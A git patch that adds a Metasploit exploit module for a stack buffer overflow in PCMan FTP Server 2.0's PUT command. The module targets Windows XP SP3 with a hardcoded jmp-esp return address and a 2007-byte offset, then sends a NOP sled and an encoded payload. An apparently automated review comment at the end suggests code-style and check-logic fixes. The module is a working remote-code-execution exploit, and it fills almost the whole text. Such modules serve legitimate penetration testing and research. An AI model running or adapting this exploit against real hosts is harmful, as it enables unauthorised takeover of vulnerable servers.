From ca47bf553cfcccdaa3ee2fce72b4cc01a5fb0efd Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 8 Oct 2015 12:07:10 -0500
Subject: [PATCH] Land module as incomplete
---
.../incomplete/windows/ftp/pcman_put.rb | 78 +++++++++++++++++++
1 file changed, 78 insertions(+)
create mode 100644 unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
diff --git a/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb b/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
new file mode 100644
index 0000000000..cd65aaf971
--- /dev/null
+++ b/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Ftp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PCMan FTP Server PUT Command Buffer Overflow',
+ 'Description' => %q{
+ PCMan FTP Server 2.0 is prone to an overflow condition. It
+ fails to properly sanitize user-supplied input resulting in a
+ stack-based buffer overflow. With a specially crafted 'PUT'
+ command, a remote attacker can potentially have an unspecified
+ impact.
+ },
+ 'Platform' => 'win',
+ 'Author' =>
+ [
+ 'Jay Turla'
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'EDB', '37731'],
+ [ 'OSVDB', '94624']
+ ],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1000,
+ 'BadChars' => "\x00\xff\x0a\x0d\x20\x40"
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3 English',
+ {
+ 'Ret' => 0x77c35459, # jmp esp from msvcrt.dll
+ 'Offset' => 2007
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 27 2013'))
+ end
+
+ def check
+ connect
+ disconnect
+ if (banner =~ /220 PCMan's FTP Server 2\.0/)
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ connect_login
+
+ print_status("Trying target #{target.name}...")
+
+ buf = make_nops(target['Offset']) + [target.ret].pack('V')
+ buf << make_nops(30)
+ buf << payload.encoded
+ send_cmd( ['PUT', buf] , false )
+ disconnect
+ end
+end
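Review bot: `check` returns `Exploit::CheckCode::Safe` whenever the banner regex does not match, which conflates "no banner received" with "not vulnerable" and will mislead anyone triaging a host whose FTP greeting is suppressed; a guard such as `return Exploit::CheckCode::Unknown if banner.to_s.empty?` placed before the comparison would keep the two outcomes distinct. The same method wraps the condition in parentheses and uses two explicit `return`s where the style guide prefers a modifier-form early return followed by the fallback value, `return Exploit::CheckCode::Vulnerable if banner =~ /220 PCMan's FTP Server 2\.0/` then `Exploit::CheckCode::Safe`. In `exploit`, the call `send_cmd( ['PUT', buf] , false )` carries stray spaces inside the parentheses and before the comma, which RuboCop flags; `send_cmd(['PUT', buf], false)` is the conventional form. The `false` argument to `send_cmd` is presumably the "do not wait for a reply" flag of the Ftp mixin, and a one-line comment saying so would spare the next reader a trip into the mixin source.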